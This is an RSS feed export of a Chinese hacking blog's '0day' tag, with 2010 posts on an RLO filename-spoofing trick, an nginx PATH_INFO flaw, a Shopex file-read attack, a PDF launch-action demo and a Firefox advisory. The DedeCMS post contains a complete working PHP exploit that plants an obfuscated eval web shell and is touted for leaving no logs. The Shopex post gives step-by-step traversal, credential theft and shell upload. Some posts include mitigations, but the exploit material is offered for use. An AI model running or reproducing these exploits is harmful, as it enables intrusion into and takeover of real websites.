<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Chinadu&#039;s Blog &#187; 0day</title>
	<atom:link href="http://www.4shell.org/archives/tag/0day/feed" rel="self" type="application/rss+xml" />
	<link>http://www.4shell.org</link>
	<description>关注网络安全</description>
	<lastBuildDate>Fri, 10 Feb 2012 03:53:40 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>你还敢执行txt文件吗？Windows 0day</title>
		<link>http://www.4shell.org/archives/1777.html</link>
		<comments>http://www.4shell.org/archives/1777.html#comments</comments>
		<pubDate>Thu, 10 Jun 2010 05:27:06 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[windows fun]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=1777</guid>
		<description><![CDATA[来源：Chinadu`s Blog http://www.4shell.org/archives/1777.html 其实这个算不上是漏洞也谈不上0day，只能说是一个windows fun罢了。 测试如下： 1.选择任意一个exe文件，鼠标右键选择重命名： 2.选择插入unicode控制字符，选择:RLO Start of right-to-left override 3.重命名文件为：text.exe。你将会发现： 4.双击这个“所谓的txt”看看： 5.执行成功！假如我把这个Md5Checker工具换成txt图标的一个木马呢？你还敢执行这个"所谓的txt"吗？ lol 相关文章2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞2010年04月23日 -- Shopex V4.8.4 V4.8.5 0Day 通杀2010年04月1日 -- PDF最新0day2010年03月24日 -- Firefox 3.6 0day被补了2010年03月10日 -- DedeCms v5.5 0day2010年01月31日 -- 瑞星本地提权通杀利用代码2010年01月20日 -- IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告2009年09月22日 -- Gnuboard 0day&#038;Exp2009年09月22日 -- 新云4.0最新0day2009年09月20日 -- phpcms2008 最新0day &#038; Exp]]></description>
			<content:encoded><![CDATA[<p>来源：<a href="http://www.4shell.org/archives/1777.html">Chinadu`s Blog</a></p>
<p><a href="http://www.4shell.org/archives/1777.html">http://www.4shell.org/archives/1777.html</a></p>
<p>其实这个算不上是漏洞也谈不上0day，只能说是一个windows fun罢了。</p>
<p>测试如下：</p>
<p>1.选择任意一个exe文件，鼠标右键选择重命名：</p>
<p><a href="http://www.4shell.org/wp-content/uploads/2010/06/windowsbug1.jpg"><img class="alignnone size-medium wp-image-1778" title="windowsbug1" src="http://www.4shell.org/wp-content/uploads/2010/06/windowsbug1-300x261.jpg" alt="" width="300" height="261" /></a><br />
<span id="more-1777"></span><br />
2.选择插入unicode控制字符，选择:RLO Start of right-to-left override</p>
<p><a href="http://www.4shell.org/wp-content/uploads/2010/06/windows-fun-2.jpg"><img class="alignnone size-medium wp-image-1779" title="windows-fun-2" src="http://www.4shell.org/wp-content/uploads/2010/06/windows-fun-2-300x236.jpg" alt="" width="300" height="236" /></a></p>
<p>3.重命名文件为：text.exe。你将会发现：</p>
<p><a href="http://www.4shell.org/wp-content/uploads/2010/06/windows-fun-3.jpg"><img class="alignnone size-full wp-image-1780" title="windows-fun-3" src="http://www.4shell.org/wp-content/uploads/2010/06/windows-fun-3.jpg" alt="" width="129" height="76" /></a></p>
<p>4.双击这个“所谓的txt”看看：</p>
<p><a href="http://www.4shell.org/wp-content/uploads/2010/06/windows-fun-4.jpg"><img class="alignnone size-medium wp-image-1781" title="windows-fun-4" src="http://www.4shell.org/wp-content/uploads/2010/06/windows-fun-4-300x225.jpg" alt="" width="300" height="225" /></a></p>
<p>5.执行成功！假如我把这个Md5Checker工具换成txt图标的一个木马呢？你还敢执行这个"所谓的txt"吗？</p>
<p>lol</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年05月21日 -- <a href="http://www.4shell.org/archives/1761.html" title="橙色预警：PHP PATH_INFO 存在漏洞">橙色预警：PHP PATH_INFO 存在漏洞</a></li><li>2010年04月23日 -- <a href="http://www.4shell.org/archives/1722.html" title="Shopex V4.8.4 V4.8.5 0Day 通杀">Shopex V4.8.4 V4.8.5 0Day 通杀</a></li><li>2010年04月1日 -- <a href="http://www.4shell.org/archives/1641.html" title="PDF最新0day">PDF最新0day</a></li><li>2010年03月24日 -- <a href="http://www.4shell.org/archives/1632.html" title="Firefox 3.6 0day被补了">Firefox 3.6 0day被补了</a></li><li>2010年03月10日 -- <a href="http://www.4shell.org/archives/1615.html" title="DedeCms v5.5 0day">DedeCms v5.5 0day</a></li><li>2010年01月31日 -- <a href="http://www.4shell.org/archives/1548.html" title="瑞星本地提权通杀利用代码">瑞星本地提权通杀利用代码</a></li><li>2010年01月20日 -- <a href="http://www.4shell.org/archives/1481.html" title="IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告">IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告</a></li><li>2009年09月22日 -- <a href="http://www.4shell.org/archives/1117.html" title="Gnuboard 0day&#038;Exp">Gnuboard 0day&#038;Exp</a></li><li>2009年09月22日 -- <a href="http://www.4shell.org/archives/1112.html" title="新云4.0最新0day">新云4.0最新0day</a></li><li>2009年09月20日 -- <a href="http://www.4shell.org/archives/1105.html" title="phpcms2008 最新0day &#038; Exp">phpcms2008 最新0day &#038; Exp</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1777.html/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>橙色预警：PHP PATH_INFO 存在漏洞</title>
		<link>http://www.4shell.org/archives/1761.html</link>
		<comments>http://www.4shell.org/archives/1761.html#comments</comments>
		<pubDate>Fri, 21 May 2010 04:49:36 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[nginx]]></category>
		<category><![CDATA[PHP]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1761.html</guid>
		<description><![CDATA[PS:其实10年前就爆出了这个漏洞，如今流传开了，估计能引起一场小小的革命，不少大站的源码都要流传出来了。 PHP PATH_INFO 存在漏洞 使用nginx+php组建的网站只要允许上传图片就可能被黑客入侵，直到5.21日凌晨，nginx尚未发布修复该漏洞的补丁；已经有一些网站被黑了，管理员速修复！ 测试方法： Nginx的服务器上传图片访问图片地址，后面加上4shell.php 例如：www.xx.com/upload/201005219527.jpg/4shell.php 临时修补方法,可3选其一 1、设置php.ini的： cgi.fix_pathinfo为0 重启php。最方便，但修改设置的影响需要自己评估。 2、给nginx的vhost配置添加如下内容，重启nginx。vhost较少的情况下也很方便。 if ( $fastcgi_script_name ~ \..*\/.*php ) { return 403; } 3、禁止上传目录解释PHP程序。不需要动webserver，如果vhost和服务器较多，短期内难度急剧上升；建议在vhost和服务器较少的情况下采用。 相关文章2011年12月3日 -- PHP端口复用的利用2011年12月3日 -- php open_basedir设置以及关于安全2011年06月4日 -- 也谈Nginx的CGI PATH INFO问题2011年06月4日 -- Nginx https 免费SSL证书配置指南2011年06月3日 -- nginx下wp super cache 设置2011年05月12日 -- 简单配置 IIS6 + FastCGI 高效运行PHP2011年04月30日 -- Linux下Apache与PHP安全相关设置2010年06月23日 -- 分享国外一个PHP DDOS的脚本2010年06月10日 -- [...]]]></description>
			<content:encoded><![CDATA[<p><span style="color: #ff0000;">PS:其实10年前就爆出了这个漏洞，如今流传开了，估计能引起一场小小的革命，不少大站的源码都要流传出来了。</span><br />
PHP PATH_INFO 存在漏洞</p>
<p>使用nginx+php组建的网站只要允许上传图片就可能被黑客入侵，直到5.21日凌晨，nginx尚未发布修复该漏洞的补丁；已经有一些网站被黑了，管理员速修复！</p>
<p>测试方法：</p>
<p>Nginx的服务器上传图片访问图片地址，后面加上4shell.php</p>
<p>例如：www.xx.com/upload/201005219527.jpg/4shell.php</p>
<p>临时修补方法,可3选其一<br />
<span id="more-1761"></span><br />
1、设置php.ini的：</p>
<blockquote><p>cgi.fix_pathinfo为0</p></blockquote>
<p>重启php。最方便，但修改设置的影响需要自己评估。</p>
<p>2、给nginx的vhost配置添加如下内容，重启nginx。vhost较少的情况下也很方便。</p>
<blockquote><p>if ( $fastcgi_script_name ~ \..*\/.*php ) {<br />
return 403;<br />
}</p></blockquote>
<p>3、禁止上传目录解释PHP程序。不需要动webserver，如果vhost和服务器较多，短期内难度急剧上升；建议在vhost和服务器较少的情况下采用。</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2011年12月3日 -- <a href="http://www.4shell.org/archives/2064.html" title="PHP端口复用的利用">PHP端口复用的利用</a></li><li>2011年12月3日 -- <a href="http://www.4shell.org/archives/2063.html" title="php open_basedir设置以及关于安全">php open_basedir设置以及关于安全</a></li><li>2011年06月4日 -- <a href="http://www.4shell.org/archives/1948.html" title="也谈Nginx的CGI PATH INFO问题">也谈Nginx的CGI PATH INFO问题</a></li><li>2011年06月4日 -- <a href="http://www.4shell.org/archives/1942.html" title="Nginx https 免费SSL证书配置指南">Nginx https 免费SSL证书配置指南</a></li><li>2011年06月3日 -- <a href="http://www.4shell.org/archives/1941.html" title="nginx下wp super cache 设置">nginx下wp super cache 设置</a></li><li>2011年05月12日 -- <a href="http://www.4shell.org/archives/1928.html" title="简单配置 IIS6 + FastCGI 高效运行PHP">简单配置 IIS6 + FastCGI 高效运行PHP</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1916.html" title="Linux下Apache与PHP安全相关设置">Linux下Apache与PHP安全相关设置</a></li><li>2010年06月23日 -- <a href="http://www.4shell.org/archives/1785.html" title="分享国外一个PHP DDOS的脚本">分享国外一个PHP DDOS的脚本</a></li><li>2010年06月10日 -- <a href="http://www.4shell.org/archives/1777.html" title="你还敢执行txt文件吗？Windows 0day ">你还敢执行txt文件吗？Windows 0day </a></li><li>2010年05月31日 -- <a href="http://www.4shell.org/archives/1764.html" title="Nginx 0.8.35 Space Character Remote Source Disclosure">Nginx 0.8.35 Space Character Remote Source Disclosure</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1761.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Shopex V4.8.4 V4.8.5 0Day 通杀</title>
		<link>http://www.4shell.org/archives/1722.html</link>
		<comments>http://www.4shell.org/archives/1722.html#comments</comments>
		<pubDate>Fri, 23 Apr 2010 13:02:08 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[Shopex]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1722.html</guid>
		<description><![CDATA[影响版本： Shopex V4.8.4 V4.8.5 漏洞描述： 文件过滤不严，导致任意文件读取漏洞。 测试代码： http://www.target.com/shopadmin/index.php?ctl=sfile&#038;act=getDB&#038;p[0]=../../config/config.php 可以连上数据库. mysql -h1.1..1.1 -uuser -ppass use yourbasename; select * from sdb_operators; 得到管理员用户密码./shopadmin/ 登陆 后台拿shell,没有仔细研究. 我测试的站,直接用into outfile 一个shell. 网上有个帖子,说可以爆物理路径.测试不可用. 如果install目录没删.下面这个可以看phpinfo http://www.target.com/install/svinfo.php?phpinfo=true 另外/home/cache/目录的文件,也是可以爆出来的. 相关文章2010年06月10日 -- 你还敢执行txt文件吗？Windows 0day 2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞2010年04月1日 -- PDF最新0day2010年03月24日 -- Firefox 3.6 0day被补了2010年03月10日 -- DedeCms v5.5 0day2010年01月31日 -- 瑞星本地提权通杀利用代码2010年01月20日 -- IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告2009年09月22日 -- [...]]]></description>
			<content:encoded><![CDATA[<p>影响版本： Shopex V4.8.4 V4.8.5<br />
漏洞描述： 文件过滤不严，导致任意文件读取漏洞。<br />
测试代码： </p>
<blockquote>
<p>http://www.target.com/shopadmin/index.php?ctl=sfile&#038;act=getDB&#038;p[0]=../../config/config.php</p>
</blockquote>
<p>可以连上数据库.<br />
<span id="more-1722"></span><br />
mysql -h1.1..1.1 -uuser -ppass</p>
<p>use yourbasename;</p>
<p>select * from sdb_operators;</p>
<p>得到管理员用户密码./shopadmin/ 登陆</p>
<p>后台拿shell,没有仔细研究.</p>
<p>我测试的站,直接用into outfile 一个shell.</p>
<p>网上有个帖子,说可以爆物理路径.测试不可用.</p>
<p>如果install目录没删.下面这个可以看phpinfo</p>
<blockquote>
<p>http://www.target.com/install/svinfo.php?phpinfo=true</p>
</blockquote>
<p>另外/home/cache/目录的文件,也是可以爆出来的.</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年06月10日 -- <a href="http://www.4shell.org/archives/1777.html" title="你还敢执行txt文件吗？Windows 0day ">你还敢执行txt文件吗？Windows 0day </a></li><li>2010年05月21日 -- <a href="http://www.4shell.org/archives/1761.html" title="橙色预警：PHP PATH_INFO 存在漏洞">橙色预警：PHP PATH_INFO 存在漏洞</a></li><li>2010年04月1日 -- <a href="http://www.4shell.org/archives/1641.html" title="PDF最新0day">PDF最新0day</a></li><li>2010年03月24日 -- <a href="http://www.4shell.org/archives/1632.html" title="Firefox 3.6 0day被补了">Firefox 3.6 0day被补了</a></li><li>2010年03月10日 -- <a href="http://www.4shell.org/archives/1615.html" title="DedeCms v5.5 0day">DedeCms v5.5 0day</a></li><li>2010年01月31日 -- <a href="http://www.4shell.org/archives/1548.html" title="瑞星本地提权通杀利用代码">瑞星本地提权通杀利用代码</a></li><li>2010年01月20日 -- <a href="http://www.4shell.org/archives/1481.html" title="IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告">IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告</a></li><li>2009年09月22日 -- <a href="http://www.4shell.org/archives/1117.html" title="Gnuboard 0day&#038;Exp">Gnuboard 0day&#038;Exp</a></li><li>2009年09月22日 -- <a href="http://www.4shell.org/archives/1112.html" title="新云4.0最新0day">新云4.0最新0day</a></li><li>2009年09月20日 -- <a href="http://www.4shell.org/archives/1105.html" title="phpcms2008 最新0day &#038; Exp">phpcms2008 最新0day &#038; Exp</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1722.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PDF最新0day</title>
		<link>http://www.4shell.org/archives/1641.html</link>
		<comments>http://www.4shell.org/archives/1641.html#comments</comments>
		<pubDate>Thu, 01 Apr 2010 05:37:43 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[业界资讯]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[PDF]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1641.html</guid>
		<description><![CDATA[There's a function within PDF specs to launch executables. Or to run JavaScript. Why do we need these things? With specs like these, it's no wonder it takes ages for Adobe Reader to boot up and load all the plugins. It's no wonder there are regular security problems with PDF readers in general. The perfect [...]]]></description>
			<content:encoded><![CDATA[<p>There's a function within PDF specs to launch executables. Or to run JavaScript. Why do we need these things?</p>
<p>With specs like these, it's no wonder it takes ages for Adobe Reader to boot up and load all the plugins.</p>
<p>It's no wonder there are regular security problems with PDF readers in general.</p>
<p>The perfect example is the "<a href="http://blog.didierstevens.com/2010/03/29/escape-from-pdf/">Escape from PDF</a>" demo from Didier Stevens' blog.</p>
<p>Users of <strong>Foxit Reader</strong>: try opening Didier's <a href="http://didierstevens.com/files/data/launch-action-cmd.zip">demo PDF file</a>. After opening, it will run CMD.EXE on your system; no questions asked. And this is a legitimate PDF file which uses no exploits.</p>
<p>One way to reduce your risk is not to download PDF files from the web to your machine at all. Instead of opening the files on your local machine, you can open them remotely in viewers like Google Docs. This process can be made completely automatic with plugins like <a href="http://blog.arpitnext.com/gpdf">gPDF</a> (for Chrome/Opera/Firefox/Iron). Do note that it will only work with PDF files you access in the public web.</p>
<p>Otherwise, our guidance would be to use a PDF reader that's as unpopular as possible. The less users a product has, the less attacks it will attract.</p>
<p><span style="color: #ff0000;">PS:下载</span><a href="http://didierstevens.com/files/data/launch-action-cmd.zip"><span style="color: #0000ff;">demo PDF file</span></a><span style="color: #ff0000;">运行后会弹出CMD.exe 建议各位使用chrome+Docs PDF/PowerPoint Viewer</span></p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年06月10日 -- <a href="http://www.4shell.org/archives/1777.html" title="你还敢执行txt文件吗？Windows 0day ">你还敢执行txt文件吗？Windows 0day </a></li><li>2010年05月21日 -- <a href="http://www.4shell.org/archives/1761.html" title="橙色预警：PHP PATH_INFO 存在漏洞">橙色预警：PHP PATH_INFO 存在漏洞</a></li><li>2010年04月23日 -- <a href="http://www.4shell.org/archives/1722.html" title="Shopex V4.8.4 V4.8.5 0Day 通杀">Shopex V4.8.4 V4.8.5 0Day 通杀</a></li><li>2010年03月24日 -- <a href="http://www.4shell.org/archives/1632.html" title="Firefox 3.6 0day被补了">Firefox 3.6 0day被补了</a></li><li>2010年03月10日 -- <a href="http://www.4shell.org/archives/1615.html" title="DedeCms v5.5 0day">DedeCms v5.5 0day</a></li><li>2010年01月31日 -- <a href="http://www.4shell.org/archives/1548.html" title="瑞星本地提权通杀利用代码">瑞星本地提权通杀利用代码</a></li><li>2010年01月20日 -- <a href="http://www.4shell.org/archives/1481.html" title="IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告">IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告</a></li><li>2009年09月22日 -- <a href="http://www.4shell.org/archives/1117.html" title="Gnuboard 0day&#038;Exp">Gnuboard 0day&#038;Exp</a></li><li>2009年09月22日 -- <a href="http://www.4shell.org/archives/1112.html" title="新云4.0最新0day">新云4.0最新0day</a></li><li>2009年09月20日 -- <a href="http://www.4shell.org/archives/1105.html" title="phpcms2008 最新0day &#038; Exp">phpcms2008 最新0day &#038; Exp</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1641.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Firefox 3.6 0day被补了</title>
		<link>http://www.4shell.org/archives/1632.html</link>
		<comments>http://www.4shell.org/archives/1632.html#comments</comments>
		<pubDate>Wed, 24 Mar 2010 02:03:31 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[业界资讯]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[FireFox]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1632.html</guid>
		<description><![CDATA[Update on Secunia Advisory SA38608 Mozilla was contacted by Evgeny Legerov, the security researcher who discovered the bug referenced in the Secunia report, with sufficient details to reproduce and analyze the issue.  The vulnerability was determined to be critical and could result in remote code execution by an attacker.  The vulnerability has been patched by [...]]]></description>
			<content:encoded><![CDATA[<h2><a title="Permanent Link to Update on Secunia Advisory SA38608" rel="bookmark" href="http://blog.mozilla.com/security/2010/03/18/update-on-secunia-advisory-sa38608/">Update on Secunia Advisory SA38608</a></h2>
<p>Mozilla was contacted by Evgeny Legerov, the security researcher who discovered the bug referenced in the Secunia report, with sufficient details to reproduce and analyze the issue.  The vulnerability was determined to be critical and could result in remote code execution by an attacker.  The vulnerability has been patched by developers and we are currently undergoing quality assurance testing for the fix.  Firefox 3.6.2 is scheduled to be released March 30th and will contain the fix for this issue.  As always, we encourage users to apply this update as soon as it is available to ensure a safe browsing experience.  Alternatively, users can download Release Candidate builds of Firefox 3.6.2 which contains the fix from here:  <a href="https://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/3.6.2-candidates/build3/">https://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/3.6.2-candidates/build3/</a></p>
<p><strong>Update:</strong> To clarify, as originally claimed this issue affects Firefox 3.6 only and not any earlier versions. Thunderbird and SeaMonkey are based on earlier versions of the browser engine and are not affected. People testing “3.7″ development builds should upgrade to 3.7 alpha 3 or the latest nightly build to ensure they have this fix.</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2011年04月28日 -- <a href="http://www.4shell.org/archives/1898.html" title="Firefox 应用-浏览器加速">Firefox 应用-浏览器加速</a></li><li>2010年06月10日 -- <a href="http://www.4shell.org/archives/1777.html" title="你还敢执行txt文件吗？Windows 0day ">你还敢执行txt文件吗？Windows 0day </a></li><li>2010年05月21日 -- <a href="http://www.4shell.org/archives/1761.html" title="橙色预警：PHP PATH_INFO 存在漏洞">橙色预警：PHP PATH_INFO 存在漏洞</a></li><li>2010年04月23日 -- <a href="http://www.4shell.org/archives/1722.html" title="Shopex V4.8.4 V4.8.5 0Day 通杀">Shopex V4.8.4 V4.8.5 0Day 通杀</a></li><li>2010年04月1日 -- <a href="http://www.4shell.org/archives/1641.html" title="PDF最新0day">PDF最新0day</a></li><li>2010年03月10日 -- <a href="http://www.4shell.org/archives/1615.html" title="DedeCms v5.5 0day">DedeCms v5.5 0day</a></li><li>2010年01月31日 -- <a href="http://www.4shell.org/archives/1548.html" title="瑞星本地提权通杀利用代码">瑞星本地提权通杀利用代码</a></li><li>2010年01月20日 -- <a href="http://www.4shell.org/archives/1481.html" title="IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告">IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告</a></li><li>2009年11月7日 -- <a href="http://www.4shell.org/archives/1157.html" title="Firefox的黑客插件">Firefox的黑客插件</a></li><li>2009年09月22日 -- <a href="http://www.4shell.org/archives/1117.html" title="Gnuboard 0day&#038;Exp">Gnuboard 0day&#038;Exp</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1632.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DedeCms v5.5 0day</title>
		<link>http://www.4shell.org/archives/1615.html</link>
		<comments>http://www.4shell.org/archives/1615.html#comments</comments>
		<pubDate>Wed, 10 Mar 2010 01:53:34 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[矩阵毒刺]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[DedeCMS]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1615.html</guid>
		<description><![CDATA[官方暂时没出补丁,不过我估计快了 执行成功会在在data/cache下生成t.php一句话小马 密码t,官方最新GBK和utf-8版本存在此漏洞, 此exp得特点是生产t.php得时候不留日志 &#60;?php print_r(' +----------------------------------------+ dedecms v5.5 final getwebshell exploit +----------------------------------------+ '); if ($argc &#60; 3) { print_r(' +----------------------------------------+ Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to dedecms Example: php '.$argv[0].' localhost /dedecms/ +----------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $post_a = 'plus/digg_ajax.php?id=1024e1024&#38;*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97) [...]]]></description>
			<content:encoded><![CDATA[<p>官方暂时没出补丁,不过我估计快了<br />
执行成功会在在data/cache下生成t.php一句话小马<br />
密码t,官方最新GBK和utf-8版本存在此漏洞,<br />
此exp得特点是生产t.php得时候不留日志</p>
<p><span id="more-1615"></span></p>
<blockquote><p>&lt;?php</p>
<p>print_r('</p>
<p>+----------------------------------------+</p>
<p>dedecms v5.5 final getwebshell exploit</p>
<p>+----------------------------------------+</p>
<p>');</p>
<p>if ($argc &lt; 3) {</p>
<p>print_r('</p>
<p>+----------------------------------------+</p>
<p>Usage: php '.$argv[0].' host path</p>
<p>host:      target server (ip/hostname)</p>
<p>path:      path to dedecms</p>
<p>Example:</p>
<p>php '.$argv[0].' localhost /dedecms/</p>
<p>+----------------------------------------+</p>
<p>');</p>
<p>exit;</p>
<p>}</p>
<p>error_reporting(7);</p>
<p>ini_set('max_execution_time', 0);</p>
<p>$host = $argv[1];</p>
<p>$path = $argv[2];</p>
<p>$post_a = 'plus/digg_ajax.php?id=1024e1024&amp;*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97)</p>
<p>.chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104)</p>
<p>.chr(101).chr(47).chr(116).chr(46).chr(112).chr(104)</p>
<p>.chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112)</p>
<p>.chr(104).chr(112).chr(32).chr(101).chr(118).chr(97)</p>
<p>.chr(108).chr(40).chr(36).chr(95).chr(80).chr(79)</p>
<p>.chr(83).chr(84).chr(91).chr(39).chr(116).chr(39)</p>
<p>.chr(93).chr(41).chr(59).chr(63).chr(62));/*';</p>
<p>$post_b = 'needCode=aa/../../../data/mysql_error_trace';</p>
<p>$shell = 'data/cache/t.php';</p>
<p>get_send($post_a);</p>
<p>post_send('plus/comments_frame.php',$post_b);</p>
<p>$content = post_send($shell,'t=echo tojen;');</p>
<p>if(substr($content,9,3)=='200'){</p>
<p>echo "\nShell Address is:".$host.$path.$shell;</p>
<p>}else{</p>
<p>echo "\nError.";</p>
<p>}</p>
<p>function get_send($url){</p>
<p>global $host, $path;</p>
<p>$message = "GET ".$path."$url  HTTP/1.1\r\n";</p>
<p>$message .= "Accept: */*\r\n";</p>
<p>$message .= "Referer: http://$host$path\r\n";</p>
<p>$message .= "Accept-Language: zh-cn\r\n";</p>
<p>$message .= "Content-Type: application/x-www-form-urlencoded\r\n";</p>
<p>$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";</p>
<p>$message .= "Host: $host\r\n";</p>
<p>$message .= "Connection: Close\r\n\r\n";</p>
<p>$fp = fsockopen($host, 80);</p>
<p>if(!$fp){</p>
<p>echo "\nConnect to host Error";</p>
<p>}</p>
<p>fputs($fp, $message);</p>
<p>$back = '';</p>
<p>while (!feof($fp))</p>
<p>$back .= fread($fp, 1024);</p>
<p>fclose($fp);</p>
<p>return $back;</p>
<p>}</p>
<p>function post_send($url,$cmd){</p>
<p>global $host, $path;</p>
<p>$message = "POST ".$path."$url  HTTP/1.1\r\n";</p>
<p>$message .= "Accept: */*\r\n";</p>
<p>$message .= "Referer: http://$host$path\r\n";</p>
<p>$message .= "Accept-Language: zh-cn\r\n";</p>
<p>$message .= "Content-Type: application/x-www-form-urlencoded\r\n";</p>
<p>$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";</p>
<p>$message .= "Host: $host\r\n";</p>
<p>$message .= "Content-Length: ".strlen($cmd)."\r\n";</p>
<p>$message .= "Connection: Close\r\n\r\n";</p>
<p>$message .= $cmd;</p>
<p>$fp = fsockopen($host, 80);</p>
<p>if(!$fp){</p>
<p>echo "\nConnect to host Error";</p>
<p>}</p>
<p>fputs($fp, $message);</p>
<p>$back = '';</p>
<p>while (!feof($fp))</p>
<p>$back .= fread($fp, 1024);</p>
<p>fclose($fp);</p>
<p>return $back;</p>
<p>}</p>
<p>?&gt;</p></blockquote>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2009年08月28日 -- <a href="http://www.4shell.org/archives/1066.html" title="dedecms 5.3 – 5.5注入漏洞">dedecms 5.3 – 5.5注入漏洞</a></li><li>2010年06月10日 -- <a href="http://www.4shell.org/archives/1777.html" title="你还敢执行txt文件吗？Windows 0day ">你还敢执行txt文件吗？Windows 0day </a></li><li>2010年05月21日 -- <a href="http://www.4shell.org/archives/1761.html" title="橙色预警：PHP PATH_INFO 存在漏洞">橙色预警：PHP PATH_INFO 存在漏洞</a></li><li>2010年04月23日 -- <a href="http://www.4shell.org/archives/1722.html" title="Shopex V4.8.4 V4.8.5 0Day 通杀">Shopex V4.8.4 V4.8.5 0Day 通杀</a></li><li>2010年04月1日 -- <a href="http://www.4shell.org/archives/1641.html" title="PDF最新0day">PDF最新0day</a></li><li>2010年03月24日 -- <a href="http://www.4shell.org/archives/1632.html" title="Firefox 3.6 0day被补了">Firefox 3.6 0day被补了</a></li><li>2010年01月31日 -- <a href="http://www.4shell.org/archives/1548.html" title="瑞星本地提权通杀利用代码">瑞星本地提权通杀利用代码</a></li><li>2010年01月20日 -- <a href="http://www.4shell.org/archives/1481.html" title="IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告">IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告</a></li><li>2009年09月22日 -- <a href="http://www.4shell.org/archives/1117.html" title="Gnuboard 0day&#038;Exp">Gnuboard 0day&#038;Exp</a></li><li>2009年09月22日 -- <a href="http://www.4shell.org/archives/1112.html" title="新云4.0最新0day">新云4.0最新0day</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1615.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>瑞星本地提权通杀利用代码</title>
		<link>http://www.4shell.org/archives/1548.html</link>
		<comments>http://www.4shell.org/archives/1548.html#comments</comments>
		<pubDate>Sun, 31 Jan 2010 07:04:42 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[瑞星]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1548.html</guid>
